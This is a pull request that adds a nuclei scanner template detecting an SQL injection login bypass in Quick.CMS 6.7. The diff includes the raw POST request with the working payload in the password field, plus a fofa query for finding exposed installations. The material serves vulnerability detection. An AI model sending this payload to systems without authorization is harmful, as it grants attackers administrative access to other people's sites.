### PR TITLE
Quick.CMS 6.7 SQL Injection add

### DIFF
--- a/http/vulnerabilities/other/quick-cms-sqli.yaml
+++ b/http/vulnerabilities/other/quick-cms-sqli.yaml
@@ -1,39 +1,38 @@
 id: quick-cms-sqli
 
 info:
-  name: Quick.CMS 6.7 SQL Injection Login Bypass
+  name: Quick.CMS v6.7 - SQL Injection
   author: Kazgangap
   severity: high
   description: Quick.CMS version 6.7 suffers from a remote SQL injection vulnerability that allows for authentication bypass.
   reference:
     - https://packetstormsecurity.com/files/177657/Quick.CMS-6.7-SQL-Injection.html
     - https://www.exploit-db.com/exploits/51910
-  tags: packetstorm,quickcms,sqli
+  metadata:
+    max-request: 1
+    fofa-query: body="Quick.Cms v6.7"
+  tags: packetstorm,quickcms,sqli,cms
 
 http:
   - raw:
       - |
         POST /admin.php?p=login HTTP/1.1
         Host: {{Hostname}}
-        Cache-Control: max-age=0
-        Upgrade-Insecure-Requests: 1
         Content-Type: application/x-www-form-urlencoded
-        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.112 Safari/537.36
-        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
-        Accept-Encoding: gzip, deflate, br
-        Accept-Language: en-US,en;q=0.9
-        Cookie: PHPSESSID=ak4vbm4o3jq017nr17dkk7kb9a
 
         sEmail=test%40test.net&sPass=%27+or+1%5D%2500&bAcceptLicense=1&iAcceptLicense=true
 
-
     host-redirects: true
+    max-redirects: 2
     matchers-condition: and
     matchers:
       - type: word
         part: body
         words:
-          - "Log out"
+          - "Log out</a>"
+          - "Settings</a>"
+          - "Plugins</a>"
+        condition: and
 
       - type: status
         status:

--- a/http/vulnerabilities/other/quick-cms-sqli.yaml
+++ b/http/vulnerabilities/other/quick-cms-sqli.yaml
@@ -1,0 +1,40 @@
+id: quick-cms-sqli
+
+info:
+  name: Quick.CMS 6.7 SQL Injection Login Bypass
+  author: Kazgangap
+  severity: high
+  description: Quick.CMS version 6.7 suffers from a remote SQL injection vulnerability that allows for authentication bypass.
+  reference:
+    - https://packetstormsecurity.com/files/177657/Quick.CMS-6.7-SQL-Injection.html
+    - https://www.exploit-db.com/exploits/51910
+  tags: packetstorm,quickcms,sqli
+
+http:
+  - raw:
+      - |
+        POST /admin.php?p=login HTTP/1.1
+        Host: {{Hostname}}
+        Cache-Control: max-age=0
+        Upgrade-Insecure-Requests: 1
+        Content-Type: application/x-www-form-urlencoded
+        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.112 Safari/537.36
+        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+        Accept-Encoding: gzip, deflate, br
+        Accept-Language: en-US,en;q=0.9
+        Cookie: PHPSESSID=ak4vbm4o3jq017nr17dkk7kb9a
+
+        sEmail=test%40test.net&sPass=%27+or+1%5D%2500&bAcceptLicense=1&iAcceptLicense=true
+
+
+    host-redirects: true
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "Log out"
+
+      - type: status
+        status:
+          - 200

--- a/http/vulnerabilities/other/quick-cms-sqli.yaml
+++ b/http/vulnerabilities/other/quick-cms-sqli.yaml
@@ -4,12 +4,14 @@ info:
   name: Quick.CMS v6.7 - SQL Injection
   author: Kazgangap
   severity: high
-  description: Quick.CMS version 6.7 suffers from a remote SQL injection vulnerability that allows for authentication bypass.
+  description: |
+    Quick.CMS version 6.7 suffers from a remote SQL injection vulnerability that allows for authentication bypass.
   reference:
     - https://packetstormsecurity.com/files/177657/Quick.CMS-6.7-SQL-Injection.html
     - https://www.exploit-db.com/exploits/51910
   metadata:
     max-request: 1
+    verified: true
     fofa-query: body="Quick.Cms v6.7"
   tags: packetstorm,quickcms,sqli,cms
 


### PR DESCRIPTION
Quick.CMS version 6.7 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

https://packetstormsecurity.com/files/177657/Quick.CMS-6.7-SQL-Injection.html

it's using the sql login bypass for access. If it worked, it checks for Log-out. I am attaching the relevant images.
I used nuclei burpsuite plugin.

I've validated this template locally?
- [x] YES
- [ ] NO

<img width="881" alt="sqli poc" src="https://github.com/projectdiscovery/nuclei-templates/assets/90972683/fe0caa2d-ddd5-4533-b70d-facdce6ad00a">

<img width="712" alt="son" src="https://github.com/projectdiscovery/nuclei-templates/assets/90972683/4b1dc11d-23a9-4e2b-990c-c77fc7b5ed2c">




#### Additional Details (leave it blank if not applicable)

<!-- Include Shodan / Fofa / Google Query / Docker / Screenshots if available -->
<!-- Include HTTP/TCP/DNS Matched response data snippet if available -->
<!-- Please do NOT include vulnerable host information in pull requests -->
<!-- None of the prerequisites are obligatory; they are merely intended to speed the review process. -->

### Additional References:

- [Nuclei Template Creation Guideline](https://nuclei.projectdiscovery.io/templating-guide/)
- [Nuclei Template Matcher Guideline](https://github.com/projectdiscovery/nuclei-templates/wiki/Unique-Template-Matchers)
- [Nuclei Template Contribution Guideline](https://github.com/projectdiscovery/nuclei-templates/blob/master/CONTRIBUTING.md)
- [PD-Community Discord server](https://discord.gg/projectdiscovery)